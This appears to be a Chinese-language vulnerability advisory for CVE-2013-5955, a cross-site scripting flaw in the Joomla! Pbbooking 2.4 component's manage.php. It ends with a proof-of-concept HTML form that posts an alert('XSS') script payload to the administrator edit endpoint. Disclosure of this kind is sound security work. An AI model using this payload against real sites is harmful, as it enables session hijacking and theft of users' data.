Bugtraq ID:66257
CVE ID:CVE-2013-5955
Joomla!是一套在国外相当知名的内容管理系统。
Joomla! Pbbooking组件’manage.php’脚本不正确过滤用户提交的输入,允许远程攻击者利用漏洞进行跨站脚本攻击,可获取敏感信息或劫持用户会话。
0
Joomla! Pbbooking 2.4
目前没有详细解决方案提供:
http://www.joomla.org/
<form action="http://site/joomla/administrator/index.php?option=com_pbbooking&controller=manage&task=edit"
method="post">
<input
type="text" name="id" value="1" />
<input
type="text" name="date" value="1" />
<input type="text"
name="xss" value="<script>alert('XSS')</script>"
/>
<input
type="submit" name="submit2" value="Submit" />
</form>